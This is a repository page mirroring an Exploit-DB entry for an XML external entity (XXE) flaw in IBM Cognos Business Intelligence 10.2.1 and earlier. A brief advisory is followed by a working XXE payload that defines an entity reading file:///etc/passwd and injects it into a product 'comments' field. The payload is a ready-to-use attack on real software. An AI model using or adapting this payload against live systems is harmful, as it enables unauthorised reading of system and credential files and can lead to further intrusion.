bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/38825.xml
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

20 lines
No EOL
828 B
XML
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/63719/info
IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>
Reference in a new issue View git blame Copy permalink